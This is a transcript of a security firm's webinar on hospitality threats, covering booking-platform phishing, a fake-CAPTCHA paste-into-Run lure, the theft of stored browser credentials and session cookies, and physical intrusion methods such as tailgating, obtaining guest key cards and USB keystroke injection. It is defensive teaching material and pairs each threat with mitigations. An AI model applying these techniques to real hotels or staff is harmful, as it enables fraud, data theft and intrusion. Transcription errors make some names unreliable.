Hospitality Security Webinar - 2025 Q1

Estimated read time: 1:20

    Summary

    This hospitality security webinar delved into the specific challenges and threats facing the industry, highlighting how hospitality is one of the most frequently targeted sectors by cyber attacks. The session detailed various incidents, including phishing attempts on booking platforms and innovative tactics used by attackers. Physical vulnerabilities in hotels and the importance of staff training in recognizing social engineering were also discussed. The key message was the necessity for robust cybersecurity measures tailored to the hospitality sector's unique environment.

      Highlights

      • The hospitality sector is a major target for cyber attacks, with methods constantly evolving. 🚨
      • Cyber threats include phishing on booking.com and revonate, fake CAPTCHAs, and AI-generated phishing emails. 🦠
      • Physical penetration testing reveals common vulnerabilities such as unsecured entry points and social engineering risks. 🕵️‍♂️
      • Training and awareness among hotel staff are critical to recognize and respond to threats effectively. 📚
      • Implementing multi-factor authentication and maintaining secure log management can mitigate data breaches. 🔏
      • Continual updates and assessments in cybersecurity practices are vital for staying ahead of threats. 🔄

      Key Takeaways

      • Hospitality faces high cyber threat levels due to its open and welcoming environment. 🏨
      • Phishing attempts often mimic legitimate booking platforms, making detection challenging. 📧
      • In-house developed CRMs without multi-factor authentication can lead to data breaches. 🔐
      • Fake CAPTCHAs trick users into executing malicious scripts, showcasing evolving attack strategies. 🤖
      • Physical security at hotels can be bolstered with training and awareness to prevent unauthorized access. 🔍
      • Regular penetration testing is crucial for identifying and mitigating vulnerabilities. 🔑

      Overview

      The hospitality industry is uniquely vulnerable to cyber attacks due to its inherently open and inviting nature. This webinar highlights how fraudulent schemes often mimic legitimate platforms like booking.com, making it challenging to discern genuine from malicious activity. The session also discussed how lacking cybersecurity practices, such as insufficient multi-factor authentication, can lead to breaches, drawing particular attention to incidents involving platforms like Revanate.

        On the physical security side, the webinar's second part emphasized common vulnerabilities found in hotels, including unsecured entry points and the prevalence of social engineering attacks. It showcased how attackers often exploit human error to gain access to sensitive information, underscoring the need for heightened awareness among staff. By simulating real-world attack scenarios, the webinar demonstrated potential breaches, encouraging a proactive approach to tightening security measures.

          The importance of regular reviews and updates to security measures was a recurrent theme throughout the presentation. The combination of technical defenses like multi-factor authentication, secure log management, and comprehensive staff training were emphasized as essential strategies in fortifying against both cyber and physical threats. The speakers advocated for a proactive, informed approach to security that accommodates the particular challenges and dynamics of the hospitality sector.

            Chapters

            • 00:00 - 03:00: Introduction The introduction chapter of a hospitality security webinar focuses on the increasing threats faced by the hospitality industry. The webinar aims to provide actionable intelligence to hospitality customers and industry stakeholders through a new series of webinars. The speaker emphasizes the need for heightened security awareness in hospitality due to it being a highly targeted industry.
            • 03:00 - 11:00: Revanate Phishing Attack The chapter titled 'Revanate Phishing Attack' discusses the surprising focus of phishing attacks on the hospitality industry, which is one of the highest and first targeted sectors, even above critical national infrastructure. The chapter aims to provide insights into the trends observed in Q1 of the current year to better equip companies in protecting themselves.
            • 11:00 - 18:00: Fake CAPTCHA Attack The chapter titled 'Fake CAPTCHA Attack' includes a segment from a webinar. During this chapter, Kurt, a member of the team, discusses the physical security testing being conducted in the hospitality sector. He presents interesting findings from their security assessments. The session starts with a brief introduction about Fredbike, a company co-founded by the speaker.
            • 18:00 - 23:00: AI-Generated Phishing Emails The chapter discusses the widespread growth and expansion into various industries, leading to better insights into security threats. The global customer base has allowed for the observation and understanding of international patterns and cultural differences in security threats. This includes detecting the emergence and transformation of phishing activities.
            • 23:00 - 33:00: Booking.com Phishing Attacks The chapter discusses the ongoing issue of Booking.com phishing attacks, highlighting that while the problem has been persistent for several years, there are new and interesting developments observed in the most recent quarter.
            • 33:00 - 35:00: Fake Ads and Malvertising The chapter titled 'Fake Ads and Malvertising' discusses novel trends observed in online threats, particularly focusing on recent developments in malvertising. The narrative begins with a key event involving Revanate, a major player in the hospitality industry's direct booking platforms. In an incident reminiscent of past cyber threats experienced by companies like Booking.com, Revanate fell victim to a wave of phishing emails aimed at compromising their services. The chapter highlights the significance of this event as it marks a new occurrence in the cybersecurity landscape.
            • 35:00 - 41:00: Living Off the Land Attacks This chapter discusses 'Living Off the Land' (LotL) attacks, focusing on how attackers impersonate legitimate sources like Revenate. Attackers send emails from what appears to be Revenate's own email address to bypass email protection systems that might not be checking protocols like SPF and DKIM. Additionally, similar attack emails are sent from other addresses with the aim to deceive recipients who may not scrutinize the email details.
            • 41:00 - 47:00: Physical Penetration Testing Introduction The chapter discusses physical penetration testing by drawing parallels to cyber security threats, such as phishing attacks. It describes a scenario where users receive emails instructing them to log into their accounts to address potential issues, often under threat of service disruption or cancellation. Upon clicking the links, users are directed to a phishing page that captures their login credentials, which are then exploited by attackers. This analogy highlights how penetration tests aim to identify vulnerabilities through simulated attacks.
            • 47:00 - 71:00: Common Findings in Physical Security This chapter discusses common issues identified in physical security, specifically focusing on inappropriate access and data extraction activities within a Customer Relationship Management (CRM) system. It describes a scenario where users logged into the Revanate CRM and accessed various functionalities to extract guest information. The lack of native export functionality led users to manually browse through and capture data by taking screenshots, highlighting a significant security risk due to poor access management and data protection practices.
            • 71:00 - 75:00: Social Engineering Chapter Title: Social Engineering Summary: The chapter discusses a case where attackers manipulated HTML formats to download sensitive guest information onto local machines. Despite access to the data, they only started targeting victims in January of this year by sending phishing emails. These emails requested additional payments for bookings, either before the guest had initially paid or as a secondary payment, highlighting a methodical social engineering attack.
            • 75:00 - 80:00: Improving Security Measures The chapter titled 'Improving Security Measures' discusses a series of phishing attacks targeting customers, who began receiving suspicious messages via email. Some customers promptly recognized the threat and reported back to the hotels. It was discovered that attackers had been collecting this information for months. The security team's response, as stated by Revan in January, involved informing customers who had reported these phishing attempts.
            • 80:00 - 95:30: Conclusion and Q&A In the Conclusion and Q&A chapter, it was revealed that a security breach occurred due to the absence of multifactor authentication (MFA) on accounts around August to November 2024. This vulnerability allowed attackers to successfully execute a simple phishing attack by capturing usernames and passwords, which were sufficient to access the platform. Despite the time elapsed since then, this oversight was a critical factor in the security lapse.

            Hospitality Security Webinar - 2025 Q1 Transcription

            • 00:00 - 00:30 Hello and welcome to our hospitality security webinar. Uh this is the very first webinar that we've been doing uh this year. Uh we've started a new series of these because what we want to be able to do is deliver actionable intelligence to our hospitality customers and other people within the industry. Because what we're seeing is that hospitality is one of the most targeted industries uh that are around today. So a lot of people
            • 00:30 - 01:00 would think that a lot of taxs are against things like critical national infrastructure. And whilst they are, we actually see that one of the highest targeted and one of the first targeted industries is actually hospitality. And so what we wanted to do is we want to walk through some of the things that we've been seeing in quarter 1 of this year so that you have the information that you need to protect your companies. So over this session I'm going to be stepping through and going through some of the things that we've been seeing and
            • 01:00 - 01:30 then we're very lucky to actually also have uh on the second part of today's webinar uh one of the people from our team uh Kurt. He's going to be walking you through some of the physical security testing that we've been carrying out as well within hospitality and showing you some of the interesting findings that we've been making. So let's kick off. Uh very quick introduction uh for those who don't know but Fredbike is a company which I co-founded actually and
            • 01:30 - 02:00 essentially we've kind of grown uh very like extensively over the last few years uh across the the globe. We now cover a very large number of different industries. We see a lot of different active security threats and we're able to actually see patterns of activity emerging where we can actually see where it first starts and then what it turns into. And so having a global customer base has really actually helped us to understand the cultural differences
            • 02:00 - 02:30 between uh different regions and the different approaches that people have had to cyber security. And so with no uh I'm going to take you through now uh the things that we have seen this quarter. So if we kick off now some of the things that we've actually seen are things which would have been been appearing in previous years. So we're going to talk about some of the booking.com fishing which has actually also been happening for the last couple of years. But we've actually seen some really interesting
            • 02:30 - 03:00 stuff where this is the very first time that we've seen it through all the time that we've been monitoring. So if we start off with one of the key things that happened at the beginning of this year, it was actually around Revanate. So Revanate as I'm sure most of you will know is one of the largest direct booking platform vendors that exist in hospitality industry. And what happened to them is that like Booking.com, there was a whole series of different fishing emails that were sent out to Revenate
            • 03:00 - 03:30 customers pretending to actually be Revenate. And I've got a couple of examples of that here. So, what we can see is that the emails are either coming from Revenate's own email address, hoping that people's email protection systems will fail and just let those emails through, not checking for things like SPF and DKIM. But also, we saw the same type of emails being sent from other email addresses. Obviously, trying to hope that the person receiving these emails won't actually look very closely
            • 03:30 - 04:00 at where they're coming from. But in all cases, these emails were directing the user to log onto their Revonate account in order to deal with a potential problem. Typically kind of threatening them that their service was about to be either disrupted or about to be cancelled. And so when they would actually click through on these links, the page that they would land on very much again like the Booking.com fishing attacks would actually capture their username and password. And the attackers would use that username and password to
            • 04:00 - 04:30 log in to the Revanate CRM as that customer. And then what we found that they did when they actually were logging in is they were going into different parts of the functionality within the Revanate platform. uh such as the for example here we can see the guest uh information um rebonate I don't think actually provides much in the way of uh native export functionality so what they actually did is they stepped through pages and pages of guest information taking screenshots potentially saving it
            • 04:30 - 05:00 uh to for in HTML format to their local machine but they were actually capturing all the sensitive information about guests um but interestingly they didn't actually target those guests until this year. And so what happened this year is all of a sudden in January, guests started receiving these fishing emails where they were being asked for to pay for uh their booking. So an additional kind of payment uh step either before they'd made payment or actually as a secondary payment. And so the guests
            • 05:00 - 05:30 started receiving these messages um on their emails which then obviously like a number of them actually realized at the time that this didn't look quite right and started reporting it back to the hotels. And so what was particularly interesting is that the attackers actually kept this information for months. And so when digging into this, Revan's actual response to this, and this is in January, is is that they actually then told customers in response to them reporting these fishing attacks
            • 05:30 - 06:00 that actually the breach had happened around about November, I think it was in a time range between potentially August to November in 2024 when Rebonate didn't enforce multiffactor authentication on accounts. And so because there was no multifactor authentication, a simple username and password fish was more than sufficient to capture the credentials and log in to the platform. And so unfortunately because time had moved on so much at this point and despite
            • 06:00 - 06:30 Revenue actually being so compliant, they only held on to 30 days of access logs. So it was actually impossible to prove which account was compromised, when it was compromised, or what it was used for. And so the whole thing was a little bit of a a serious data privacy issue where it was impossible to actually do that kind of triage and root cause analysis step. And so people just blindly have to take this information from Revanate that this is the way that
            • 06:30 - 07:00 this attack happened and that their systems themselves weren't compromised. But there was literally no evidence to that fact. So some of the key lessons and I think it's important to pull this out not just kind of go through the problems here but actually highlight what kind of lessons we could learn from this. And some of the key ones are that we should be looking to integrate these kind of web applications be it booking.com be it revonate into single sign on and unfortunately they don't always make that available as an option and so more
            • 07:00 - 07:30 pressure uh on them to perform and allow these kind of integrations would seriously reduce the potential risk here. Um where obviously multiffactor is available it should always be used. So Rebonet did have the option of actually using multiffactor but a lot of people chose not to use it. And finally where possible should also be looking to capture the logs uh the audit logs essentially within these platforms pull them into your own uh SIM log management
            • 07:30 - 08:00 system and actually analyze that activity and look for suspicious login just like you would if it was say Office 365 or Microsoft Azure. Okay, so moving on to the next threat that we've seen this year. Um, and this is something that again we saw actually targeting hospitality first before it then moved out into other industries is fake captures. So what is a fake capture? Now this was quite an interesting. So here we can see on the page uh and this example that there's a
            • 08:00 - 08:30 a website again purporting to be booking.com the partner hub. Um but clearly from the URL you can see that it's not Booking.com. Now, interestingly, people started to receive these links as they were before for for fakebooking.com uh websites. But now, rather than asking people for their username and password, what they were instead asked to do is to prove that they weren't a robot. And so, the method for doing that was to essentially open um to to press the Windows button and R
            • 08:30 - 09:00 as you can see in the instructions here, dot control and V and press enter. And so what actually happened here is is that the browser um in JavaScript it allows you to actually copy things onto the clipboard. So what the web page did is it copied a malicious script onto the clipboard and then convinced the uh the user at the machine to actually open up the Windows run dialogue, paste it in and press enter. And so here we can see like the kind of full sequence to this.
            • 09:00 - 09:30 So the user initially receives an email and so here we can see typical kind of thing. I would like to extend my stay. I've stumbled upon a review. Here's the URL. They're guiding the the person who's receiving this email through the process of going to that website. So, they go to that website. They actually hit the Cloudflare capture which is legitimate and a lot of time they actually use that capture in order to evade automatic security scraping solutions. So if the uh security tool
            • 09:30 - 10:00 goes off and it tries to open this URL itself and take a screenshot and and run it through some sort of analysis, unfortunately all it will see is the cloudfare capture. So first they prove that you actually are a human and so you go through that stage and then you get to this fake capture and this fake capture you have to click on it looks like a real capture comes up with these additional verification steps. The user follows the instruction and then actually pastes this information directly into the Windows run dialogue.
            • 10:00 - 10:30 And so here we can see mshta which is one of the Windows script interpreters. It provides a URL where to pull the script from and it actually has a little bit of extra text at the end which says I am not a robot to make it look a little bit more legitimate. And so here we can actually see an alert that's been flagged up when this has happened. So the executable code has been copied from that window. It's been pasted into to Windows uh run. It's been executed. We can see MSHTA here running reaching out downloading
            • 10:30 - 11:00 additional content from the internet and executing it. So this is really uh now this is kind of really taken off as an approach. So we're seeing this approach not only apply to emails but also when you go to search engines and you click through some of the results sometimes if those websites have been compromised they'll be doing the exact same thing. And I have to say it's been very effective in convincing a number of different users to go ahead and try to execute this. So it's really really important that you're hardening your
            • 11:00 - 11:30 endpoints against these types of attacks. So again coming to our lessons learned, we need to be looking at blocking script interpreters. So things like MSHTA, PowerShell, we need to be disabling the run dialogue for users where possible. I mean why do they need to use it? It's an advanced feature. And always we should be looking at running EDR on the endpoints to actually detect these types of attacks and block them as they get executed. Now a particularly interesting
            • 11:30 - 12:00 one that uh we spotted uh this quarter as well is fully AI generated fishing emails. So last year we started to see partially AI generated emails. Now we're seeing the full thing. So here there's a few examples of actually where the hotels are receiving emails which purportedly come from a guest of the hotel. They go off and they talk about how the food was not nice or the stay was not good or there was a review or something something which uh they
            • 12:00 - 12:30 weren't particularly happy with. And then in the middle of this it drops in a URL and again that URL takes them off and sends them off to a fishing site. But what was particularly interesting about this is I mean you can see the depth that the person has gone to when they've written this email except it's not a person. It's actually there are tools on the internet like zero GPT where you can actually run text through and it will tell you if it's been generated by AI or not. And so here we can see that the full thing that all of
            • 12:30 - 13:00 this text is AI generated. And so this creates an amazing ability for attackers to craft any sort of fishing email they want and insert all kinds of nuances, randomness into the text in order to bypass the male filters. Now is another example of this. You can see, but it's formatted slightly differently. Um, it's quite interesting, I think, this example because again, it doesn't really read very well. When you look at the text, it kind of mixes up
            • 13:00 - 13:30 the customer and the hotel. So they start saying that for example um that they've seen feedback uh and then they want to talk about it about why the feedback was left on them which apparently was on a website. So it's all a little bit confused and again they guide the the person who's receiving this email off to another website to review this uh this this review which has supposedly been found. But again fully AI generated and in these cases there is absolutely nothing in terms of
            • 13:30 - 14:00 like there's no copyright information. There's no information here where mail filters can look at it and say look you know this is a fakebooking.com website. This is just purportedly a person a guest who's complaining about their their stay. And so moving on to the next one a booking.com fishing obviously been incredibly popular for the last couple of years. we have seen this take a step up recently. So looking at some of the examples um some of the examples are a
            • 14:00 - 14:30 lot more sophisticated than others. So this is an example from recently uh where again they're talking about the guest experience that's been a very common one recently and talking about you know the complaint has been left and I think the complaint part of this you can see there's a commonality it really triggers people into actually opening up these links and so here they're saying that complaint has been left um from a guest click see details to get more information and then it takes you off again to a fakebooking.com
            • 14:30 - 15:00 website. Now, an interesting twist on this, and I I don't think we've seen this a lot recently, is where actually there's like a an email with very very little information in there talking about uh how there's a system update. It has very little information in the actual um email itself, but it has an attachment. And weirdly in the attachment there's actually a copy of the email as you would expect to see in say Outlook but as a PDF. So again you
            • 15:00 - 15:30 can see these new adapt uh adaptations of this attack and they're kind of trying and trying and trying to bypass all the different rules that people have put in place to try to detect these types of attacks and stop them. Now this one I actually found probably the most interesting. So there are some companies who have been struggling a lot with booking.com fishing. I mean you know obviously a lot of companies have had these problems but some companies have actually really really struggled with this even after
            • 15:30 - 16:00 look locking down their Booking.com uh profiles. So they'll have all the controls in place. They'll have the multiffactor in place and guests will still be receiving these fishing messages which are actually coming through the booking.com application or through the booking.com site. So it's it looks entirely legitimate from where it's coming from. But obviously you can see in these messages that they're not legitimate. So they are trying to extort
            • 16:00 - 16:30 further money from guests. Now, after conducting the forensics in these cases, there were no malicious loginins on the Booking.com accounts. No settings had been changed. And so, it really beg the question like how was this possible that guests were receiving messages through the Booking.com application, which looked incredibly legitimate, and they were legitimate. They were really coming through Booking.com if the Booking.com account had not been compromised. And so this one was quite the challenge to uh
            • 16:30 - 17:00 to work out. Um but having conducted the incident response in this case um what we actually noticed was that the customer themselves had a completely separate and interestingly in-house developed uh CRM in which they were tracking all of the user information. So here on the right hand side in this screenshot you can actually see a screenshot of this uh information which
            • 17:00 - 17:30 they were capturing and just kind of draw your attention to this bit here which says guest.booking.com. This is actually an email address. Okay. And so everybody who uh creates a booking of booking.com gets assigned their own specific email address in which the hotel can then use and they can email that email address. And when they do email that email address, it actually comes out as a message inside the Booking.com application. So it wasn't
            • 17:30 - 18:00 Booking.com itself that had been compromised. It wasn't even the login details of Booking.com that have been compromised. It was actually the CRM. And again, no multiffactor authentication on that CRM. So clearly at some point an account maybe a credential stuffing account maybe some other sort of fishing account uh that fishing attack that had happened but ultimately somebody had gained access to CRM. They were able to siphon off these unique email addresses and they were then able to actually um directly send
            • 18:00 - 18:30 messages to those um people who were staying with them. And so you can actually see this as well in these uh screenshots. You can see that the Booking.com account hasn't actually been compromised because there is link protection that's been enabled within this account. So, it prevents people from actually putting links into the messages. And so, um, they're actually having to split up the links in order to bypass that protection. They're basically telling the guest, copy both
            • 18:30 - 19:00 parts, put them together, put it into the browser, and, you know, obviously it's more work less likely that people are going to do it. And so the obvious solution here would be for the attacker to turn off the link protection, but they can't because they don't have access to the booking.com account. So really really interesting um case to actually uh work through that one. Now we've also seen recently uh that adverts have been used to essentially
            • 19:00 - 19:30 capture uh guests of different hotels as well before they get to the website the official website of those hotels. So what will happen is is that a guest will go they will search for a particular hotel on one of the search engines. they will then um actually like obviously scroll down but before they get to the legitimate website for the hotel they'll come across the adverts and what the attackers are actually starting to do is they're starting to take out adverts
            • 19:30 - 20:00 which then direct the uh the people to a fake website. Okay. So initially what we found actually is that these websites are really just kind of scams in a way. So what they're doing is they're trying to um uplift the price uh and essentially kind of add on additional cost for the guest so that they get paid as part of this process. So there's a lot of negative reviews um obviously about this kind of practice here. But it's very interesting because this
            • 20:00 - 20:30 practice could easily be applied to fishing or even malware in the future. So there's been a lot of different cases where malicious adverts have been taken out and driven people to click on them and then to actually be taken to malware related websites where they might download something and again it could be a fishing page. They could type in their username and password. But it's interesting to see that the attackers are actually willing to pay for this access. they will actually pay money to the search engine providers to put these
            • 20:30 - 21:00 malicious links above the legitimate links of the uh the websites uh of the hotels that they're targeting. Um in this case, I think one of the key lessons here is is that it's important to just kind of regularly check search engines, right? So to put the names of the hotels into search engines and just kind of look at that guest journey. What does it look like? Is there anything there that shouldn't be? just to again identify any um potential fraudsters who are out there or in you know future cases it might be
            • 21:00 - 21:30 fishing that's being conducted. Um alternatively there are reputation protection services that you can sign up to who will do all this kind of work for you um and then send you alerts should this type of thing happen. Um another interesting one that occurred I'm just moving on to the last couple of examples here before Kurt takes over. And so on the last couple of examples, if we go through um this one is again quite interesting uh because
            • 21:30 - 22:00 what's happened here is that a user has received an email and if we look at it, it says uh this is a essentially a fake voice message that the user has received. And this email says clink click the link below to the voice message except you can't click it, right? There is actually no link here. It says having trouble listening to this. Copy and paste this link into your browser. And so here we can see looker studio and then we can see this percentage 2e uh percentage 67. And so
            • 22:00 - 22:30 what this is is actually called URL encoding. So this is ways of encoding characters in a URL. And actually percentage 2e actually is a forward slash. And so Outlook in this case doesn't recognize this as a valid URL. So neither will email protection solutions potentially. They'll look at this and they'll think it's just text. And but interestingly, when you take this text and you copy it across to the browser, you can see the top example here where it's been copied across. You paste that in, press enter, it
            • 22:30 - 23:00 automatically decodes that URL and then takes you to the Lucer Studio site. And within Lucer Studio, it's just another one of these sites where it's be used as staging. So essentially one drive um dropbox lucer studio these are very common sites for where there'll be staging where they will take you to it. It's a very legitimate website but on it it will have some content which then drives you off to another website which is a lot less legitimate. Um, and recently, we touched
            • 23:00 - 23:30 on this actually last year a little bit in some of the conferences that we were attending, but there's been a very significant uplift in what was called living off the land attacks. This is where rather than installing malware onto a machine, what's happening is is that staff at hotels are being coerced into downloading remote control software. And so, this could be something like Team Viewer, it could be Any Desk. There's lots and lots of different tools that essentially could be used, but they get a telephone call.
            • 23:30 - 24:00 Somebody pretending to be it or something like this asks them to download this application. The EDR doesn't flag it. The antivirus doesn't flag it because these are legitimate applications. But the problem is is that once then that application is installed, the attacker can come back to that system anytime they want. And when they do come back to it, they'll be then presented with everything that that user has access to, which could be PMS software. And so they might try to then exfiltrate the data out of that PMS
            • 24:00 - 24:30 software which obviously then turns into a data breach. One recent uh case that we saw uh was very interesting because rather than actually looking at the PMS directly on the machine, what they actually attempted to do was to extract the credentials that were stored in the browser. So um you might find that users are storing username and passwords using the native functionality of the browser. The problem with this is that it's incredibly insecure. And so what can
            • 24:30 - 25:00 happen is is that an attacker, he can gain access to the machine. He can open up the developer tools in the browser. He sees that the username and password's cached. He simply clicks sign in. And then he can actually capture the username and password that's being submitted to that site. And now he has the login details. He can take them out that session. He can go and put them into his own machine. And then he can log on. And you might be thinking that multiffactor is a solution to this. But Unfortunately, if multiffactor is actually applied, then what they can do is they can copy the session cookies
            • 25:00 - 25:30 out. Those session cookies can be inserted into a different browser and it gives them full access to whatever the user's logged in as. And so, a couple a few of the lessons that we can learn from this is that we should be blocking remote access tools where they're not required. We should be again monitoring the logs from things like Opera for suspicious activity. Making sure that we know where activity is coming from, what users are doing, where they're logging in from, and making sure that we're looking for suspicious activity uh patterns of
            • 25:30 - 26:00 activity which might indicate that an attacker has access to those accounts. And also it was usually generally good practice as well to prevent users from storing passwords in their browsers as well as files or any of the 10 million places where users decide to store these things. All right. So actually rather than taking questions now um what I'm going to do is I'm going to hand over to Kurt uh from our team and Kurt is going to now uh take us through some of the
            • 26:00 - 26:30 physical uh penetration testing that we do for some of our customers and show you some of the common findings that come out of that. Madam, just making sure you can hear me before I start whizzing through all of the points I got. Okay, it looks like I am on audio.
            • 26:30 - 27:00 Perfect. Right, so let's get to it. I'm just going to bring my screen over. Okay. So, what we'll cover here is um a quick understanding of what physical penetration testing is. Um we'll go through some of the most common vulnerabilities that we find at hotels and I'll talk about social engineering and how to prepare your staff to recognize these type of attacks. We'll also go over how to improve your hotel
            • 27:00 - 27:30 security. And if we have time at the end, I'll talk about some real world examples of attacks we've carried out at Threat Spike. So, who am I now? I'm Kurt Hems. I've been a pentester for about two years and I work at Threat Spike as one of the lead physical penetration testers. I simulate real world attacks all over the world and help hotels and other organizations remediate their vulnerabilities. So we meticulously
            • 27:30 - 28:00 craft attacks to replicate threat actors in order to demonstrate how they would exfiltrate data from your organization. Now, Adam's touched on this, but Alcow we have we're covering I think it's more than 80 countries now and we've helped secure our clients for nearly 15 years. And as Adam mentioned, we offer endpoint security and detection as well as red teaming simulations to help protect organizations against a um and black teaming is part of the array of services
            • 28:00 - 28:30 that we offer. Now black teaming or physical penetration testing is essentially evolving simulating real world attacks to identify your weaknesses before malicious actors. So most people think of cyber security as protecting a network or a web application. However, so many people forget the importance of the physical attack surface present on site actually at premises. And hotels are no different
            • 28:30 - 29:00 to other organizations as there's an importance to protect data to ensure the safety of your clients as physical security makes up part of the kill chain. So in the image here you can see some of the penetration testing kit we use on engagements which consists of many different tools that are used by threat actors all over the globe. So we are literally creating the same scenarios as real life threat actors. So we'll jump straight into the
            • 29:00 - 29:30 most common findings we have on a typical black team engagement. And I'll cover these off to give examples of how we exploit these vulnerabilities when carrying out specific attack vectors. As cyber security is open source in this industry, findings are usually better to be shared. Um, so organizations can increase their defenses. A lot of these attacks have never actually been disclosed before and we're giving you a lot of insight into how to better secure
            • 29:30 - 30:00 your hotel. I've obviously left out a lot of critical findings that we usually find um just for the purpose of um non-disclosures, but from past hotel engagements, I'm showing you how to rectify some of these vulnerabilities with immediate effect. So, without further ado, let's jump into the first one. So, we've got unsecured entry points, and they are usually the biggest
            • 30:00 - 30:30 downfall to allowing attacks to escalate. By failing to lock doors, our teams usually able to access sensitive files that can be used to escalate our attacks into accounts and systems. And I'll touch more on that in a little bit to what that can lead to. Whilst rooms are usually locked, we often find that human error plays a massive part in this attack vector. And once the door's left unsecured, our team go to work on finding data in drawers, accessing machines, reviewing transactional data,
            • 30:30 - 31:00 building cover stories for social engineering by reading files that are easily accessible. Now, a question to ask yourself is how much data can an attacker gain if they were to walk into your offices? And I can imagine that most people that get asked that question will be saying a lot of data. So, it's always important to ensure that doors are triple checked at the end of a shift or um in um in less busy hours. So,
            • 31:00 - 31:30 we'll move on to vulnerable entry points. So, not only is this internal offices that we were just talking about, but also entry points on the exterior of buildings as well. So when we're on site, we think as an attacker and one of our main focuses is gaining entry into the premises if we were not a guest at the hotel. Once an attacker's inside, they can move freely into restricted areas. So we also look for things like CCTV blind spots um just to simulate an attack where our team can get in and out
            • 31:30 - 32:00 without detection. So, it's imperative to ensure that your fortress is essentially bulletproof and that extra precautions are taken into considering what you do during off peak hours. Again, another one is um the passwords stored in notebooks here and human habits play a massive role in this as well. Um, we're in a culture where we're taught to update our passwords as often as we can. And with constantly changing
            • 32:00 - 32:30 passwords, we tend to start writing these down in areas that we can refer back to. And attackers know this. Um, they will exploit these habits to access your machines and accounts. It doesn't finish with just passwords as well. We find bank details, pin numbers, you name it. It's all written in the back of the same places. And the vast majority of people write down their sensitive information. and I will hold my hand up. Before I was in cyber security, I was one to do this. I flip back to the back of my notepad and write all of my
            • 32:30 - 33:00 information there. And I'm sure many people do too, which is what we're finding on these engagements. So, it's time to make the change and start rolling out these practices to ensure that staff members in the hotel are also not doing this because this is what we're finding during attacks. Now, this is a site that we see, albeit these aren't real images that we've taken from some of our engagements. This is a stock image, but we're seeing this far too often. This is another example
            • 33:00 - 33:30 of human error at play. When staff drawers are left unlocked, it's easy for attackers to access sensitive documents, credentials, again, personal information. Even something as simple as leaving a drawer open can open the door to bigger security breaches. If we manage to enter a restricted area, we can further our attack by accessing drawers where staff leave them unlocked. This is usually where the most critical findings surface. So in the image, you can see that the keys are left in these
            • 33:30 - 34:00 drawers and it's a regular mistake. We again see it time and time again on engagements. So even if the drawers are locked, the keys are left in them, which makes it very easy for our team to exfiltrate data. A lack of clean desk policy is another common vulnerability. When staff leave confidential material, documents or personal information out on the desk, it creates an opportunity for an attacker to gather sensitive data. The clean desk policy ensures that that sensitive information is locked away or
            • 34:00 - 34:30 secured when not in use for. So for us, desks are usually a gold mine for sensitive data, and it's one of the easiest ways for an attack to gather intelligence um to escalate whilst we're on site. Machine USB ports not being disabled. Uh with offices pretty much covered in the uh in the previous points, we can move on to more machine-based attacks here. So USB ports
            • 34:30 - 35:00 on machines are often left unsecured and that allows attackers to use USB based attacks like running malicious payloads um plugging in um HID devices. So once they have once an attacker has physical access to a device, we often find that these ports aren't disabled on machines that don't actually need them and it leaves the door open for a lot of problems. This is something that your IT department would usually manage using group policy on the domain and essentially you can disable all machine
            • 35:00 - 35:30 USB ports that aren't needed. Guest elevators um that allow people to easily access multiple floors or sorry attackers to access multiple floors create an opportunity for them to perh perform reconnaissance and gather intel without being detected. If an attacker can access areas that they shouldn't be able to, they can exploit those entry points to launch attacks. In the past, we've actually used this type of access to enter through fire exits to
            • 35:30 - 36:00 offlimit floors, and it makes it a lot easier to maneuver through the hotel floors. So, access to a basement is obviously far easier for an attacker from floor one rather than going from floor 12 and going down fire exits. So having access to other floors can also lead to guest rooms being accessed as well. And also finding other offlimit areas such as cleaning staff rooms um and smaller offices that you shouldn't
            • 36:00 - 36:30 be able to find if you're not on that floor. At the reception desk, we also find a lot of sensitive guest information left out in the open. Either it's on paper or on screens. And if an attacker has access to this data, they can use it for identity threat theft, fraud, or more targeted attacks to specific guests at the hotel. Whilst we're on the subject of like reception desks, the team have noticed a regular occurrence of receptionists leaving their posts and they leave machines
            • 36:30 - 37:00 unlocked, making it easier for us to again plug in devices that can shell a machine. This makes it insanely easy for uh a remote access Trojan to be placed on the on the machine um with human interactable devices. So we can use like keystroke injection from a completely different location inside the hotel. So yeah, the the data being left on display on reception desks is almost as
            • 37:00 - 37:30 important as them being uh left unlocked and abandoned. So, reception desks are one of the main important areas that we look at when on engagements to see how the staff are acting whilst we uh whilst we're watching them. Cleaning carts. Now, this is a unique one. Cleaning carts sometimes contain guest information like names, room numbers, and checkout dates. Uh these are actually on physical cleaning
            • 37:30 - 38:00 schedules which can easily be accessed by an attacker. These carts are often left unattended in public spaces, providing a prime opportunity for data exfiltration. So in the past attacks we've carried out, the black teamers at threat spike have used this data to request room key cards for specific guests. As these attacks are a proof of concept, we wouldn't access guest rooms. However, the lack of verification would allow an attacker to enter a room with malicious intent. And as a bonus finding
            • 38:00 - 38:30 that isn't actually noted in these slides, our team have also discovered that internal room phones can call other hotel rooms, which allows for impersonation of hotel staff. So this vector can lure guests from their rooms to attend reception, leaving their rooms unoccupied, which chains attack methodologies together to create a critical finding. We can lure guests out their rooms. Um, if we have their key card, we can open the door and access personal belongings. And if there's laptops or machines in there that we can
            • 38:30 - 39:00 take and get data from, slow closing doors uh that don't automatically latch can make it easier for attackers to tailgate behind employees and gain access to secure areas. Tailgating is one of the easiest ways for attackers to bypass physical security. Um and slow closlo doors make it even easier. I won't go into too much detail with this common attack vector, but it's often forgotten when looking at physical security. And this type of
            • 39:00 - 39:30 bypass is one of the most popular that is exploited by malicious actors. It's often forgotten. I've seen far too many times slowed doors taking 20 seconds to shut and it gives an attacker ample time to grab the door before it closes or latches um and walk into a room or walk into a restricted area. Staff networks that aren't hidden or encrypted properly create opportunities for attackers too. Um they can join a
            • 39:30 - 40:00 network especially if it's not protected by uh strong authentication. So by infiltrating staff networks attacker attackers can access sensitive data and systems that shouldn't be exposed. If your network is not hidden and it's important to ensure that a secure passwords used. We're seeing during our engagements that a lot of passwords can be easily guessed or used in a custom word list that would be used in a brute force attack. So, it's probably wise to review these passwords used on staff
            • 40:00 - 40:30 networks to ensure that they aren't guessable. Now, I believe that kitchen kitchen access is overlooked most of the time, but the kitchen is another area that can be vulnerable to attack. It's not just about food safety. It's unrestricted access that could lead to contamination attacks where malicious actors can introduce harmful substances or alter food alter food orders. Um,
            • 40:30 - 41:00 additionally, sensitive operational information can also be accessed if security isn't tight enough. And understandably, if you have access to that sort of data or if you have access to the the kitchen, you can actually create a bad reputation for that company or that hotel chain. um if there was like a poisoning attack. Guest machines um like the ones in business centers, they often don't
